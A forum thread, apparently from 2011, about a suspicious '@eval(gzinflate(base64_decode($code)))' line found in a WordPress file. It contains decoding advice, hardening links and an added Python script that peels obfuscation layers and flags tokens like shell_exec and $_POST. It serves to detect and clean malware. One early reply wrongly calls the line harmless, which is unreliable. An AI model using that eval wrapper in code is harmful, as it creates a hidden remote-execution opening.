Solved

Is this Malicious code?

Posted on 2011-03-23
Last Modified: 2012-05-11
Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my wordpress files...

Question by: checkmofoshoduno

10 Comments

Expert Comment

by:eaglerod
ID: 35204600
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.

Author Comment

by:checkmofoshoduno
ID: 35204603
How can I check to see what the code actually is when it's decoded?

Expert Comment

by:Phil Phillips
ID: 35204630
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' Wordpress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval

Expert Comment

by:eaglerod
ID: 35204631
I believe this is what you are looking for.

Decoding Information

Expert Comment

by:Jason C. Levine
ID: 35204633
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.

Expert Comment

by:m_walker
ID: 35204634
@eval(gzinflate(base64_decode($code)));

try
// same decoding steps as the original line, but print the result instead of running it
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Not sure where $code gets its value from.
The code could be binary, so expect some weird results.
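The decode-and-inspect approach suggested by Jason C. Levine and m_walker above, as an added example that is not from any of the posters: a Python triage script that peels nested eval(gzinflate(base64_decode('...'))) layers without ever executing the payload, then reports which functions the plaintext calls. The sample payload and the suspicious-token list are constructed here for illustration; gzinflate() is PHP's raw DEFLATE, which maps to zlib with negative wbits.

```python
import base64
import re
import zlib

# The wrapper from the question: eval(gzinflate(base64_decode('...'))), optional "@" prefix.
WRAPPER = re.compile(
    r"@?eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)"
)

# Tokens worth flagging in a decoded WordPress file (assumed, illustrative list).
SUSPICIOUS = ["eval(", "base64_decode(", "$_POST", "$_GET", "chmod", "shell_exec(",
              "system(", "exec(", "passthru(", "backdoor"]

def gzinflate(data: bytes) -> bytes:
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header, hence wbits = -15."""
    return zlib.decompress(data, -15)

def peel(php_source, max_layers=10):
    """Strip nested eval(gzinflate(base64_decode(...))) layers without executing anything. Returns (plaintext, layers removed)."""
    current, layers = php_source, 0
    while layers < max_layers:
        match = WRAPPER.search(current)
        if not match:
            break
        blob = re.sub(r"\s+", "", match.group(1))  # PHP base64_decode ignores whitespace
        current = gzinflate(base64.b64decode(blob)).decode("utf-8", errors="replace")
        layers += 1
    return current, layers

def flag(decoded):
    """Return the SUSPICIOUS tokens present in the decoded text, in list order."""
    return [t for t in SUSPICIOUS if t in decoded]

def wrap(php_source):
    """Build one obfuscation layer in the question's shape; used only to construct the sample."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, like PHP gzdeflate()
    raw = comp.compress(php_source.encode()) + comp.flush()
    return "<?php @eval(gzinflate(base64_decode('" + base64.b64encode(raw).decode() + "'))); ?>"

# Constructed, harmless sample: a script that only echoes, wrapped twice to show
# that a single decode pass (one echo of gzinflate(base64_decode($code))) is not always enough.
INNER = '<?php if (isset($_POST["p"])) { echo "hello"; } ?>'
SAMPLE = wrap(wrap(INNER))

if __name__ == "__main__":
    text, n = peel(SAMPLE)
    print("layers removed:", n)
    print(text)
    print("flags:", flag(text))
```

Point peel() at the contents of the suspicious theme file rather than at SAMPLE to inspect a real find; writing the result to a file instead of echoing it from PHP avoids the binary-output problem m_walker mentions.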

Author Comment

by:checkmofoshoduno
ID: 35204644
Yep, I managed to also find that link for the decoder, and unless that site is messing with me, I am seeing the output say "Load and Exploit" and a bunch of other not so good things such as Port Binding.

Looks like I will just remove that block of code for now...

Please see attached.


Expert Comment

by:Lukasz Chmielewski
ID: 35204821
The additional question: how did it get there? Change your access passwords to strong ones and do not store them locally on your computer.

Accepted Solution

by: Phil Phillips (earned 500 total points)
ID: 35204927
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make Wordpress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here are a few blog posts that discuss how to recover from a hacked WordPress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.

Expert Comment

by:Jason C. Levine
ID: 35208486
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.